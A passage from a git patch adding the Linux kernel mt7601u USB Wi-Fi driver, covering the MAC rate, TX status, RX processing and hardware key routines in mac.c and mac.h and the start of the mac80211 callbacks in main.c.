>> 8; + rate_idx = val & 0xff; + bw = 0; + } + + rateval = MT76_SET(MT_RXWI_RATE_MCS, rate_idx); + rateval |= MT76_SET(MT_RXWI_RATE_PHY, phy); + rateval |= MT76_SET(MT_RXWI_RATE_BW, bw); + if (rate->flags & IEEE80211_TX_RC_SHORT_GI) + rateval |= MT_RXWI_RATE_SGI; + + *nss_val = nss; + return rateval; +} + +void mt76_mac_wcid_set_rate(struct mt7601u_dev *dev, struct mt76_wcid *wcid, + const struct ieee80211_tx_rate *rate) +{ + unsigned long flags; + + spin_lock_irqsave(&dev->lock, flags); + wcid->tx_rate = mt76_mac_tx_rate_val(dev, rate, &wcid->tx_rate_nss); + wcid->tx_rate_set = true; + spin_unlock_irqrestore(&dev->lock, flags); +} + +struct mt76_tx_status mt7601u_mac_fetch_tx_status(struct mt7601u_dev *dev) +{ + struct mt76_tx_status stat = {}; + u32 val; + + val = mt7601u_rr(dev, MT_TX_STAT_FIFO); + stat.valid = !!(val & MT_TX_STAT_FIFO_VALID); + stat.success = !!(val & MT_TX_STAT_FIFO_SUCCESS); + stat.aggr = !!(val & MT_TX_STAT_FIFO_AGGR); + stat.ack_req = !!(val & MT_TX_STAT_FIFO_ACKREQ); + stat.pktid = MT76_GET(MT_TX_STAT_FIFO_PID_TYPE, val); + stat.wcid = MT76_GET(MT_TX_STAT_FIFO_WCID, val); + stat.rate = MT76_GET(MT_TX_STAT_FIFO_RATE, val); + + return stat; +} + +void mt76_send_tx_status(struct mt7601u_dev *dev, struct mt76_tx_status *stat) +{ + struct ieee80211_tx_info info = {}; + struct ieee80211_sta *sta = NULL; + struct mt76_wcid *wcid = NULL; + void *msta; + + rcu_read_lock(); + if (stat->wcid < ARRAY_SIZE(dev->wcid)) + wcid = rcu_dereference(dev->wcid[stat->wcid]); + + if (wcid) { + msta = container_of(wcid, struct mt76_sta, wcid); + sta = container_of(msta, struct ieee80211_sta, + drv_priv); + } + + mt76_mac_fill_tx_status(dev, &info, stat); + ieee80211_tx_status_noskb(dev->hw, sta, &info); + rcu_read_unlock(); +} + +void mt7601u_mac_set_protection(struct mt7601u_dev *dev, bool legacy_prot, + int ht_mode) +{ + int mode = ht_mode & IEEE80211_HT_OP_MODE_PROTECTION; + bool non_gf = !!(ht_mode & IEEE80211_HT_OP_MODE_NON_GF_STA_PRSNT); + u32 prot[6]; + bool ht_rts[4] = {}; + int i; + + prot[0] = MT_PROT_NAV_SHORT | + MT_PROT_TXOP_ALLOW_ALL | + MT_PROT_RTS_THR_EN; + prot[1] = prot[0]; + if (legacy_prot) + prot[1] |= MT_PROT_CTRL_CTS2SELF; + + prot[2] = prot[4] = MT_PROT_NAV_SHORT | MT_PROT_TXOP_ALLOW_BW20; + prot[3] = prot[5] = MT_PROT_NAV_SHORT | MT_PROT_TXOP_ALLOW_ALL; + + if (legacy_prot) { + prot[2] |= MT_PROT_RATE_CCK_11; + prot[3] |= MT_PROT_RATE_CCK_11; + prot[4] |= MT_PROT_RATE_CCK_11; + prot[5] |= MT_PROT_RATE_CCK_11; + } else { + prot[2] |= MT_PROT_RATE_OFDM_24; + prot[3] |= MT_PROT_RATE_DUP_OFDM_24; + prot[4] |= MT_PROT_RATE_OFDM_24; + prot[5] |= MT_PROT_RATE_DUP_OFDM_24; + } + + switch (mode) { + case IEEE80211_HT_OP_MODE_PROTECTION_NONE: + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_NONMEMBER: + ht_rts[0] = ht_rts[1] = ht_rts[2] = ht_rts[3] = true; + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_20MHZ: + ht_rts[1] = ht_rts[3] = true; + break; + + case IEEE80211_HT_OP_MODE_PROTECTION_NONHT_MIXED: + ht_rts[0] = ht_rts[1] = ht_rts[2] = ht_rts[3] = true; + break; + } + + if (non_gf) + ht_rts[2] = ht_rts[3] = true; + + for (i = 0; i < 4; i++) + if (ht_rts[i]) + prot[i + 2] |= MT_PROT_CTRL_RTS_CTS; + + for (i = 0; i < 6; i++) + mt7601u_wr(dev, MT_CCK_PROT_CFG + i * 4, prot[i]); +} + +void mt7601u_mac_set_short_preamble(struct mt7601u_dev *dev, bool short_preamb) +{ + if (short_preamb) + mt76_set(dev, MT_AUTO_RSP_CFG, MT_AUTO_RSP_PREAMB_SHORT); + else + mt76_clear(dev, MT_AUTO_RSP_CFG, MT_AUTO_RSP_PREAMB_SHORT); +} + +void mt7601u_mac_config_tsf(struct mt7601u_dev *dev, bool enable, int interval) +{ + u32 val = mt7601u_rr(dev, MT_BEACON_TIME_CFG); + + val &= ~(MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + MT_BEACON_TIME_CFG_TBTT_EN); + + if (!enable) { + mt7601u_wr(dev, MT_BEACON_TIME_CFG, val); + return; + } + + val &= ~MT_BEACON_TIME_CFG_INTVAL; + val |= MT76_SET(MT_BEACON_TIME_CFG_INTVAL, interval << 4) | + MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + MT_BEACON_TIME_CFG_TBTT_EN; +} + +static void mt7601u_check_mac_err(struct mt7601u_dev *dev) +{ + u32 val = mt7601u_rr(dev, 0x10f4); + + if (!(val & BIT(29)) || !(val & (BIT(7) | BIT(5)))) + return; + + dev_err(dev->dev, "Error: MAC specific condition occurred\n"); + + mt76_set(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_RESET_CSR); + udelay(10); + mt76_clear(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_RESET_CSR); +} + +void mt7601u_mac_work(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + mac_work.work); + struct { + u32 addr_base; + u32 span; + u64 *stat_base; + } spans[] = { + { MT_RX_STA_CNT0, 3, dev->stats.rx_stat }, + { MT_TX_STA_CNT0, 3, dev->stats.tx_stat }, + { MT_TX_AGG_STAT, 1, dev->stats.aggr_stat }, + { MT_MPDU_DENSITY_CNT, 1, dev->stats.zero_len_del }, + { MT_TX_AGG_CNT_BASE0, 8, &dev->stats.aggr_n[0] }, + { MT_TX_AGG_CNT_BASE1, 8, &dev->stats.aggr_n[16] }, + }; + u32 sum, n; + int i, j, k; + + /* Note: using MCU_RANDOM_READ is actually slower then reading all the + * registers by hand. MCU takes ca. 20ms to complete read of 24 + * registers while reading them one by one will takes roughly + * 24*200us =~ 5ms. + */ + + k = 0; + n = 0; + sum = 0; + for (i = 0; i < ARRAY_SIZE(spans); i++) + for (j = 0; j < spans[i].span; j++) { + u32 val = mt7601u_rr(dev, spans[i].addr_base + j * 4); + + spans[i].stat_base[j * 2] += val & 0xffff; + spans[i].stat_base[j * 2 + 1] += val >> 16; + + /* Calculate average AMPDU length */ + if (spans[i].addr_base != MT_TX_AGG_CNT_BASE0 && + spans[i].addr_base != MT_TX_AGG_CNT_BASE1) + continue; + + n += (val >> 16) + (val & 0xffff); + sum += (val & 0xffff) * (1 + k * 2) + + (val >> 16) * (2 + k * 2); + k++; + } + + atomic_set(&dev->avg_ampdu_len, n ? DIV_ROUND_CLOSEST(sum, n) : 1); + + mt7601u_check_mac_err(dev); + + ieee80211_queue_delayed_work(dev->hw, &dev->mac_work, 10 * HZ); +} + +void +mt7601u_mac_wcid_setup(struct mt7601u_dev *dev, u8 idx, u8 vif_idx, u8 *mac) +{ + u8 zmac[ETH_ALEN] = {}; + u32 attr; + + attr = MT76_SET(MT_WCID_ATTR_BSS_IDX, vif_idx & 7) | + MT76_SET(MT_WCID_ATTR_BSS_IDX_EXT, !!(vif_idx & 8)); + + mt76_wr(dev, MT_WCID_ATTR(idx), attr); + + if (mac) + memcpy(zmac, mac, sizeof(zmac)); + + mt7601u_addr_wr(dev, MT_WCID_ADDR(idx), zmac); +} + +void mt7601u_mac_set_ampdu_factor(struct mt7601u_dev *dev) +{ + struct ieee80211_sta *sta; + struct mt76_wcid *wcid; + void *msta; + u8 min_factor = 3; + int i; + + rcu_read_lock(); + for (i = 0; i < ARRAY_SIZE(dev->wcid); i++) { + wcid = rcu_dereference(dev->wcid[i]); + if (!wcid) + continue; + + msta = container_of(wcid, struct mt76_sta, wcid); + sta = container_of(msta, struct ieee80211_sta, drv_priv); + + min_factor = min(min_factor, sta->ht_cap.ampdu_factor); + } + rcu_read_unlock(); + + mt7601u_wr(dev, MT_MAX_LEN_CFG, 0xa0fff | + MT76_SET(MT_MAX_LEN_CFG_AMPDU, min_factor)); +} + +static void +mt76_mac_process_rate(struct ieee80211_rx_status *status, u16 rate) +{ + u8 idx = MT76_GET(MT_RXWI_RATE_MCS, rate); + + switch (MT76_GET(MT_RXWI_RATE_PHY, rate)) { + case MT_PHY_TYPE_OFDM: + if (WARN_ON(idx >= 8)) + idx = 0; + idx += 4; + + status->rate_idx = idx; + return; + case MT_PHY_TYPE_CCK: + if (idx >= 8) { + idx -= 8; + status->flag |= RX_FLAG_SHORTPRE; + } + + if (WARN_ON(idx >= 4)) + idx = 0; + + status->rate_idx = idx; + return; + case MT_PHY_TYPE_HT_GF: + status->flag |= RX_FLAG_HT_GF; + /* fall through */ + case MT_PHY_TYPE_HT: + status->flag |= RX_FLAG_HT; + status->rate_idx = idx; + break; + default: + WARN_ON(1); + return; + } + + if (rate & MT_RXWI_RATE_SGI) + status->flag |= RX_FLAG_SHORT_GI; + + if (rate & MT_RXWI_RATE_STBC) + status->flag |= 1 << RX_FLAG_STBC_SHIFT; + + if (rate & MT_RXWI_RATE_BW) + status->flag |= RX_FLAG_40MHZ; +} + +static void +mt7601u_rx_monitor_beacon(struct mt7601u_dev *dev, struct mt7601u_rxwi *rxwi, + u16 rate, int rssi) +{ + dev->bcn_freq_off = rxwi->freq_off; + dev->bcn_phy_mode = MT76_GET(MT_RXWI_RATE_PHY, rate); + dev->avg_rssi = (dev->avg_rssi * 15) / 16 + (rssi << 8); +} + +static int +mt7601u_rx_is_our_beacon(struct mt7601u_dev *dev, u8 *data) +{ + struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)data; + + return ieee80211_is_beacon(hdr->frame_control) && + ether_addr_equal(hdr->addr2, dev->ap_bssid); +} + +u32 mt76_mac_process_rx(struct mt7601u_dev *dev, struct sk_buff *skb, + u8 *data, void *rxi) +{ + struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb); + struct mt7601u_rxwi *rxwi = rxi; + u32 ctl = le32_to_cpu(rxwi->ctl); + u16 rate = le16_to_cpu(rxwi->rate); + int rssi; + + if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_DECRYPT)) { + status->flag |= RX_FLAG_DECRYPTED; + status->flag |= RX_FLAG_IV_STRIPPED | RX_FLAG_MMIC_STRIPPED; + } + + status->chains = BIT(0); + rssi = mt7601u_phy_get_rssi(dev, rxwi, rate); + status->chain_signal[0] = status->signal = rssi; + status->freq = dev->chandef.chan->center_freq; + status->band = dev->chandef.chan->band; + + mt76_mac_process_rate(status, rate); + + spin_lock_bh(&dev->con_mon_lock); + if (mt7601u_rx_is_our_beacon(dev, data)) + mt7601u_rx_monitor_beacon(dev, rxwi, rate, rssi); + else if (rxwi->rxinfo & cpu_to_le32(MT_RXINFO_U2M)) + dev->avg_rssi = (dev->avg_rssi * 15) / 16 + (rssi << 8); + spin_unlock_bh(&dev->con_mon_lock); + + return MT76_GET(MT_RXWI_CTL_MPDU_LEN, ctl); +} + +static enum mt76_cipher_type +mt76_mac_get_key_info(struct ieee80211_key_conf *key, u8 *key_data) +{ + memset(key_data, 0, 32); + if (!key) + return MT_CIPHER_NONE; + + if (key->keylen > 32) + return MT_CIPHER_NONE; + + memcpy(key_data, key->key, key->keylen); + + switch (key->cipher) { + case WLAN_CIPHER_SUITE_WEP40: + return MT_CIPHER_WEP40; + case WLAN_CIPHER_SUITE_WEP104: + return MT_CIPHER_WEP104; + case WLAN_CIPHER_SUITE_TKIP: + return MT_CIPHER_TKIP; + case WLAN_CIPHER_SUITE_CCMP: + return MT_CIPHER_AES_CCMP; + default: + return MT_CIPHER_NONE; + } +} + +int mt76_mac_wcid_set_key(struct mt7601u_dev *dev, u8 idx, + struct ieee80211_key_conf *key) +{ + enum mt76_cipher_type cipher; + u8 key_data[32]; + u8 iv_data[8]; + u32 val; + + cipher = mt76_mac_get_key_info(key, key_data); + if (cipher == MT_CIPHER_NONE && key) + return -EINVAL; + + trace_set_key(dev, idx); + + mt7601u_wr_copy(dev, MT_WCID_KEY(idx), key_data, sizeof(key_data)); + + memset(iv_data, 0, sizeof(iv_data)); + if (key) { + iv_data[3] = key->keyidx << 6; + if (cipher >= MT_CIPHER_TKIP) { + /* Note: start with 1 to comply with spec, + * (see comment on common/cmm_wpa.c:4291). + */ + iv_data[0] |= 1; + iv_data[3] |= 0x20; + } + } + mt7601u_wr_copy(dev, MT_WCID_IV(idx), iv_data, sizeof(iv_data)); + + val = mt7601u_rr(dev, MT_WCID_ATTR(idx)); + val &= ~MT_WCID_ATTR_PKEY_MODE & ~MT_WCID_ATTR_PKEY_MODE_EXT; + val |= MT76_SET(MT_WCID_ATTR_PKEY_MODE, cipher & 7) | + MT76_SET(MT_WCID_ATTR_PKEY_MODE_EXT, cipher >> 3); + val &= ~MT_WCID_ATTR_PAIRWISE; + val |= MT_WCID_ATTR_PAIRWISE * + !!(key && key->flags & IEEE80211_KEY_FLAG_PAIRWISE); + mt7601u_wr(dev, MT_WCID_ATTR(idx), val); + + return 0; +} + +int mt76_mac_shared_key_setup(struct mt7601u_dev *dev, u8 vif_idx, u8 key_idx, + struct ieee80211_key_conf *key) +{ + enum mt76_cipher_type cipher; + u8 key_data[32]; + u32 val; + + cipher = mt76_mac_get_key_info(key, key_data); + if (cipher == MT_CIPHER_NONE && key) + return -EINVAL; + + trace_set_shared_key(dev, vif_idx, key_idx); + + mt7601u_wr_copy(dev, MT_SKEY(vif_idx, key_idx), + key_data, sizeof(key_data)); + + val = mt76_rr(dev, MT_SKEY_MODE(vif_idx)); + val &= ~(MT_SKEY_MODE_MASK << MT_SKEY_MODE_SHIFT(vif_idx, key_idx)); + val |= cipher << MT_SKEY_MODE_SHIFT(vif_idx, key_idx); + mt76_wr(dev, MT_SKEY_MODE(vif_idx), val); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/mac.h b/drivers/net/wireless/mediatek/mt7601u/mac.h new file mode 100644 index 000000000000..2c22d63c63a2 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/mac.h @@ -0,0 +1,178 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT76_MAC_H +#define __MT76_MAC_H + +struct mt76_tx_status { + u8 valid:1; + u8 success:1; + u8 aggr:1; + u8 ack_req:1; + u8 is_probe:1; + u8 wcid; + u8 pktid; + u8 retry; + u16 rate; +} __packed __aligned(2); + +/* Note: values in original "RSSI" and "SNR" fields are not actually what they + * are called for MT7601U, names used by this driver are educated guesses + * (see vendor mac/ral_omac.c). + */ +struct mt7601u_rxwi { + __le32 rxinfo; + + __le32 ctl; + + __le16 frag_sn; + __le16 rate; + + u8 unknown; + u8 zero[3]; + + u8 snr; + u8 ant; + u8 gain; + u8 freq_off; + + __le32 resv2; + __le32 expert_ant; +} __packed __aligned(4); + +#define MT_RXINFO_BA BIT(0) +#define MT_RXINFO_DATA BIT(1) +#define MT_RXINFO_NULL BIT(2) +#define MT_RXINFO_FRAG BIT(3) +#define MT_RXINFO_U2M BIT(4) +#define MT_RXINFO_MULTICAST BIT(5) +#define MT_RXINFO_BROADCAST BIT(6) +#define MT_RXINFO_MYBSS BIT(7) +#define MT_RXINFO_CRCERR BIT(8) +#define MT_RXINFO_ICVERR BIT(9) +#define MT_RXINFO_MICERR BIT(10) +#define MT_RXINFO_AMSDU BIT(11) +#define MT_RXINFO_HTC BIT(12) +#define MT_RXINFO_RSSI BIT(13) +#define MT_RXINFO_L2PAD BIT(14) +#define MT_RXINFO_AMPDU BIT(15) +#define MT_RXINFO_DECRYPT BIT(16) +#define MT_RXINFO_BSSIDX3 BIT(17) +#define MT_RXINFO_WAPI_KEY BIT(18) +#define MT_RXINFO_PN_LEN GENMASK(21, 19) +#define MT_RXINFO_SW_PKT_80211 BIT(22) +#define MT_RXINFO_TCP_SUM_BYPASS BIT(28) +#define MT_RXINFO_IP_SUM_BYPASS BIT(29) +#define MT_RXINFO_TCP_SUM_ERR BIT(30) +#define MT_RXINFO_IP_SUM_ERR BIT(31) + +#define MT_RXWI_CTL_WCID GENMASK(7, 0) +#define MT_RXWI_CTL_KEY_IDX GENMASK(9, 8) +#define MT_RXWI_CTL_BSS_IDX GENMASK(12, 10) +#define MT_RXWI_CTL_UDF GENMASK(15, 13) +#define MT_RXWI_CTL_MPDU_LEN GENMASK(27, 16) +#define MT_RXWI_CTL_TID GENMASK(31, 28) + +#define MT_RXWI_FRAG GENMASK(3, 0) +#define MT_RXWI_SN GENMASK(15, 4) + +#define MT_RXWI_RATE_MCS GENMASK(6, 0) +#define MT_RXWI_RATE_BW BIT(7) +#define MT_RXWI_RATE_SGI BIT(8) +#define MT_RXWI_RATE_STBC GENMASK(10, 9) +#define MT_RXWI_RATE_ETXBF BIT(11) +#define MT_RXWI_RATE_SND BIT(12) +#define MT_RXWI_RATE_ITXBF BIT(13) +#define MT_RXWI_RATE_PHY GENMASK(15, 14) + +#define MT_RXWI_GAIN_RSSI_VAL GENMASK(5, 0) +#define MT_RXWI_GAIN_RSSI_LNA_ID GENMASK(7, 6) +#define MT_RXWI_ANT_AUX_LNA BIT(7) + +#define MT_RXWI_EANT_ENC_ANT_ID GENMASK(7, 0) + +enum mt76_phy_type { + MT_PHY_TYPE_CCK, + MT_PHY_TYPE_OFDM, + MT_PHY_TYPE_HT, + MT_PHY_TYPE_HT_GF, +}; + +enum mt76_phy_bandwidth { + MT_PHY_BW_20, + MT_PHY_BW_40, +}; + +struct mt76_txwi { + __le16 flags; + __le16 rate_ctl; + + u8 ack_ctl; + u8 wcid; + __le16 len_ctl; + + __le32 iv; + + __le32 eiv; + + u8 aid; + u8 txstream; + __le16 ctl; +} __packed __aligned(4); + +#define MT_TXWI_FLAGS_FRAG BIT(0) +#define MT_TXWI_FLAGS_MMPS BIT(1) +#define MT_TXWI_FLAGS_CFACK BIT(2) +#define MT_TXWI_FLAGS_TS BIT(3) +#define MT_TXWI_FLAGS_AMPDU BIT(4) +#define MT_TXWI_FLAGS_MPDU_DENSITY GENMASK(7, 5) +#define MT_TXWI_FLAGS_TXOP GENMASK(9, 8) +#define MT_TXWI_FLAGS_CWMIN GENMASK(12, 10) +#define MT_TXWI_FLAGS_NO_RATE_FALLBACK BIT(13) +#define MT_TXWI_FLAGS_TX_RPT BIT(14) +#define MT_TXWI_FLAGS_TX_RATE_LUT BIT(15) + +#define MT_TXWI_RATE_MCS GENMASK(6, 0) +#define MT_TXWI_RATE_BW BIT(7) +#define MT_TXWI_RATE_SGI BIT(8) +#define MT_TXWI_RATE_STBC GENMASK(10, 9) +#define MT_TXWI_RATE_PHY_MODE GENMASK(15, 14) + +#define MT_TXWI_ACK_CTL_REQ BIT(0) +#define MT_TXWI_ACK_CTL_NSEQ BIT(1) +#define MT_TXWI_ACK_CTL_BA_WINDOW GENMASK(7, 2) + +#define MT_TXWI_LEN_BYTE_CNT GENMASK(11, 0) +#define MT_TXWI_LEN_PKTID GENMASK(15, 12) + +#define MT_TXWI_CTL_TX_POWER_ADJ GENMASK(3, 0) +#define MT_TXWI_CTL_CHAN_CHECK_PKT BIT(4) +#define MT_TXWI_CTL_PIFS_REV BIT(6) + +u32 mt76_mac_process_rx(struct mt7601u_dev *dev, struct sk_buff *skb, + u8 *data, void *rxi); +int mt76_mac_wcid_set_key(struct mt7601u_dev *dev, u8 idx, + struct ieee80211_key_conf *key); +void mt76_mac_wcid_set_rate(struct mt7601u_dev *dev, struct mt76_wcid *wcid, + const struct ieee80211_tx_rate *rate); + +int mt76_mac_shared_key_setup(struct mt7601u_dev *dev, u8 vif_idx, u8 key_idx, + struct ieee80211_key_conf *key); +u16 mt76_mac_tx_rate_val(struct mt7601u_dev *dev, + const struct ieee80211_tx_rate *rate, u8 *nss_val); +struct mt76_tx_status +mt7601u_mac_fetch_tx_status(struct mt7601u_dev *dev); +void mt76_send_tx_status(struct mt7601u_dev *dev, struct mt76_tx_status *stat); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/main.c b/drivers/net/wireless/mediatek/mt7601u/main.c new file mode 100644 index 000000000000..ced82abb414f --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/main.c @@ -0,0 +1,412 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" +#include "mac.h" +#include +#include + +static int mt7601u_start(struct ieee80211_hw *hw) +{ + struct mt7601u_dev *dev = hw->priv; + int ret; + + mutex_lock(&dev->mutex); + + ret = mt7601u_mac_start(dev); + if (ret) + goto out; + + ieee80211_queue_delayed_work(dev->hw, &dev->mac_work, + MT_CALIBRATE_INTERVAL); + ieee80211_queue_delayed_work(dev->hw, &dev->cal_work, + MT_CALIBRATE_INTERVAL); +out: + mutex_unlock(&dev->mutex); + return ret; +} + +static void mt7601u_stop(struct ieee80211_hw *hw) +{ + struct mt7601u_dev *dev = hw->priv; + + mutex_lock(&dev->mutex); + + cancel_delayed_work_sync(&dev->cal_work); + cancel_delayed_work_sync(&dev->mac_work); + mt7601u_mac_stop(dev); + + mutex_unlock(&dev->mutex); +} + +static int mt7601u_add_interface(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + unsigned int idx = 0; + unsigned int wcid = GROUP_WCID(idx); + + /* Note: for AP do the AP-STA things mt76 does: + * - beacon offsets + * - do mac address tricks + * - shift vif idx + */ + mvif->idx = idx; + + if (dev->wcid_mask[wcid / BITS_PER_LONG] & BIT(wcid % BITS_PER_LONG)) + return -ENOSPC; + dev->wcid_mask[wcid / BITS_PER_LONG] |= BIT(wcid % BITS_PER_LONG); + mvif->group_wcid.idx = wcid; + mvif->group_wcid.hw_key_idx = -1; + + return 0; +} + +static void mt7601u_remove_interface(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + unsigned int wcid = mvif->group_wcid.idx; + + dev->wcid_mask[wcid / BITS_PER_LONG] &= ~BIT(wcid % BITS_PER_LONG); +} + +static int mt7601u_config(struct ieee80211_hw *hw, u32 changed) +{ + struct mt7601u_dev *dev = hw->priv; + int ret = 0; + + mutex_lock(&dev->mutex); + + if (changed & IEEE80211_CONF_CHANGE_CHANNEL) { + ieee80211_stop_queues(hw); + ret = mt7601u_phy_set_channel(dev, &hw->conf.chandef); + ieee80211_wake_queues(hw); + } + + mutex_unlock(&dev->mutex); + + return ret; +} + +static void +mt76_configure_filter(struct ieee80211_hw *hw, unsigned int changed_flags, + unsigned int *total_flags, u64 multicast) +{ + struct mt7601u_dev *dev = hw->priv; + u32 flags = 0; + +#define MT76_FILTER(_flag, _hw) do { \ + flags |= *total_flags & FIF_##_flag; \ + dev->rxfilter &= ~(_hw); \ + dev->rxfilter |= !(flags & FIF_##_flag) * (_hw); \ + } while (0) + + mutex_lock(&dev->mutex); + + dev->rxfilter &= ~MT_RX_FILTR_CFG_OTHER_BSS; + + MT76_FILTER(FCSFAIL, MT_RX_FILTR_CFG_CRC_ERR); + MT76_FILTER(PLCPFAIL, MT_RX_FILTR_CFG_PHY_ERR); + MT76_FILTER(CONTROL, MT_RX_FILTR_CFG_ACK | + MT_RX_FILTR_CFG_CTS | + MT_RX_FILTR_CFG_CFEND | + MT_RX_FILTR_CFG_CFACK | + MT_RX_FILTR_CFG_BA | + MT_RX_FILTR_CFG_CTRL_RSV); + MT76_FILTER(PSPOLL, MT_RX_FILTR_CFG_PSPOLL); + + *total_flags = flags; + mt76_wr(dev, MT_RX_FILTR_CFG, dev->rxfilter); + + mutex_unlock(&dev->mutex); +} + +static void +mt7601u_bss_info_changed(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_bss_conf *info, u32 changed) +{ + struct mt7601u_dev *dev = hw->priv; + + mutex_lock(&dev->mutex); + + if (changed & BSS_CHANGED_ASSOC) + mt7601u_phy_con_cal_onoff(dev, info); + + if (changed & BSS_CHANGED_BSSID) { + mt7601u_addr_wr(dev, MT_MAC_BSSID_DW0, info->bssid); + + /* Note: this is a hack because beacon_int is not changed + * on leave nor is any more appropriate event generated. + * rt2x00 doesn't seem to be bothered though. + */ + if (is_zero_ether_addr(info->bssid)) + mt7601u_mac_config_tsf(dev, false, 0); + } + + if (changed & BSS_CHANGED_BASIC_RATES) { + mt7601u_wr(dev, MT_LEGACY_BASIC_RATE, info->basic_rates); + mt7601u_wr(dev, MT_HT_FBK_CFG0, 0x65432100); + mt7601u_wr(dev, MT_HT_FBK_CFG1, 0xedcba980); + mt7601u_wr(dev, MT_LG_FBK_CFG0, 0xedcba988); + mt7601u_wr(dev, MT_LG_FBK_CFG1, 0x00002100); + } + + if (changed & BSS_CHANGED_BEACON_INT) + mt7601u_mac_config_tsf(dev, true, info->beacon_int); + + if (changed & BSS_CHANGED_HT || changed & BSS_CHANGED_ERP_CTS_PROT) + mt7601u_mac_set_protection(dev, info->use_cts_prot, + info->ht_operation_mode); + + if (changed & BSS_CHANGED_ERP_PREAMBLE) + mt7601u_mac_set_short_preamble(dev, info->use_short_preamble); + + if (changed & BSS_CHANGED_ERP_SLOT) { + int slottime = info->use_short_slot ? 9 : 20; + + mt76_rmw_field(dev, MT_BKOFF_SLOT_CFG, + MT_BKOFF_SLOT_CFG_SLOTTIME, slottime); + } + + if (changed & BSS_CHANGED_ASSOC) + mt7601u_phy_recalibrate_after_assoc(dev); + + mutex_unlock(&dev->mutex); +} + +static int +mt76_wcid_alloc(struct mt7601u_dev *dev) +{ + int i, idx = 0; + + for (i = 0; i < ARRAY_SIZE(dev->wcid_mask); i++) { + idx = ffs(~dev->wcid_mask[i]); + if (!idx) + continue; + + idx--; + dev->wcid_mask[i] |= BIT(idx); + break; + } + + idx = i * BITS_PER_LONG + idx; + if (idx > 119) + return -1; + + return idx; +} + +static int +mt7601u_sta_add(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + int ret = 0; + int idx = 0; + + mutex_lock(&dev->mutex); + + idx = mt76_wcid_alloc(dev); + if (idx < 0) { + ret = -ENOSPC; + goto out; + } + + msta->wcid.idx = idx; + msta->wcid.hw_key_idx = -1; + mt7601u_mac_wcid_setup(dev, idx, mvif->idx, sta->addr); + mt76_clear(dev, MT_WCID_DROP(idx), MT_WCID_DROP_MASK(idx)); + rcu_assign_pointer(dev->wcid[idx], &msta->wcid); + mt7601u_mac_set_ampdu_factor(dev); + +out: + mutex_unlock(&dev->mutex); + + return ret; +} + +static int +mt7601u_sta_remove(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + struct ieee80211_sta *sta) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_sta *msta = (struct mt76_sta *) sta->drv_priv; + int idx = msta->wcid.idx; + + mutex_lock(&dev->mutex); + rcu_assign_pointer(dev->wcid[idx], NULL); + mt76_set(dev, MT_WCID_DROP(idx), MT_WCID_DROP_MASK(idx)); + dev->wcid_mask[idx / BITS_PER_LONG] &= ~BIT(idx % BITS_PER_LONG); + mt7601u_mac_wcid_setup(dev, idx, 0, NULL); + mt7601u_mac_set_ampdu_factor(dev); + mutex_unlock(&dev->mutex); + + return 0; +} + +static void +mt7601u_sta_notify(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + enum sta_notify_cmd cmd, struct ieee80211_sta *sta) +{ +} + +static void +mt7601u_sw_scan(struct ieee80211_hw *hw, + struct ieee80211_vif *vif, + const u8 *mac_addr) +{ + struct mt7601u_dev *dev = hw->priv; + + mt7601u_agc_save(dev); + set_bit(MT7601U_STATE_SCANNING, &dev->state); +} + +static void +mt7601u_sw_scan_complete(struct ieee80211_hw *hw, + struct ieee80211_vif *vif) +{ + struct mt7601u_dev *dev = hw->priv; + + mt7601u_agc_restore(dev); + clear_bit(MT7601U_STATE_SCANNING, &dev->state); +} + +static int +mt7601u_set_key(struct ieee80211_hw *hw, enum set_key_cmd cmd, + struct ieee80211_vif *vif, struct ieee80211_sta *sta, + struct ieee80211_key_conf *key) +{ + struct mt7601u_dev *dev = hw->priv; + struct mt76_vif *mvif = (struct mt76_vif *) vif->drv_priv; + struct mt76_sta *msta = sta ? (struct mt76_sta *) sta->drv_priv : NULL; + struct mt76_wcid *wcid = msta ? &msta->wcid : &mvif->group_wcid; + int idx = key->keyidx; + int ret; + + if (cmd == SET_KEY) { + key->hw_key_idx = wcid->idx; + wcid->hw_key_idx 